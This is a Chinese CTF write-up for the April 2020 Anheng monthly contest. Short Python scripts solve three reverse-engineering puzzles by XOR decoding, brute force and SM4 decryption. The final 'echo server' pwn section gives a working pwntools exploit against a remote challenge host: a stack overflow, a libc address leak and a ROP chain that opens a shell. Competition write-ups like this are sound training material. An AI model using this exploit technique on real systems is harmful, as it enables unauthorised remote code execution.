0x02 - 2020安恒4月月赛记录



  • Re - 入门reverse

    • 白给的题目,flag贴脸上
    str1 = "akhb~chdaZrdaZudqduvdZvvv|"
    flag = ''
    for i in str1:
        flag += chr((ord(i) - 1) ^ 6)
    print flag
    
    • flag{daef_wef_reverse_sss}

    Re - encrypt3

    • 比较懒,没进行认真的分析,直接爆破出flag了
    enc1 = [38, 44, 33, 39, 59,
            35, 34, 115, 117, 114,
            113, 33, 36, 117, 118,
            119, 35, 120, 38, 114,
            117, 113, 38, 34, 113,
            114, 117, 114, 36, 112,
            115, 118, 121, 112, 35,
            37, 121, 61]
    
    for i in range(128):
        flag = ''
        for j in enc1:
            flag += chr(j ^ i)
        if 'flag{' in flag:
            print flag
    
    • flag{cb3521ad567c8f251fb1252d03690ce9}

    Re - sm

    • 虽然知道是 sm 加密,猜测是 sm4,但是找了半天工具没找到

      • 然后就<del>睡着了</del>干别的去了
    • 结束后看一个师傅写有解密用的轮子

    • 通过程序猜测出 key 为 0x0123456789ABCDEFFEDCBA9876543210

      • 密文为 0xC079776677E5AC9931C567EB470645A7
    • 装完轮子尝试解密出 flag

    import pysm4
    
    key = 0x0123456789ABCDEFFEDCBA9876543210
    cipher = 0xC079776677E5AC9931C567EB470645A7
    dec = pysm4.decrypt(cipher, key)
    print hex(dec)[2:-1]
    
    • flag{d0389046c236e4c66bd787959f5c6e66}

    Pwn - echo server

    • 简单栈溢出,需要注意的就是要把栈指针劫持到 bss 段
    from pwn import *
    from LibcSearcher import LibcSearcher
    #io = process('./test')
    io = remote('183.129.189.60', 10061)
    elf = ELF('./test')
    
    buf_len = 0x80
    fakeebp = p64(elf.bss() + 0x500)
    
    start_addr = 0x00000000004005C0
    pop_rdi_addr = 0x0000000000400823
    retn_addr = 0x0000000000400824
    
    payload = '\0' * buf_len + fakeebp + p64(pop_rdi_addr) + \
        p64(elf.got['printf']) + p64(0x4006EE) + p64(start_addr)
    io.sendline('2333')
    io.sendline(payload)
    io.recvuntil('hello ')
    
    printf_libc_addr = u64(io.recv().ljust(8, '\x00'))
    libc = LibcSearcher('printf', printf_libc_addr)
    system_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('system')
    bin_sh_libc_addr = printf_libc_addr - libc.dump('printf') + libc.dump('str_bin_sh')
    payload = '\0' * buf_len + fakeebp + p64(retn_addr) + p64(pop_rdi_addr) + p64(
        bin_sh_libc_addr) + p64(system_libc_addr) + p64(start_addr)
    
    io.sendline('2333')
    io.sendline(payload)
    io.interactive()
    

Log in to reply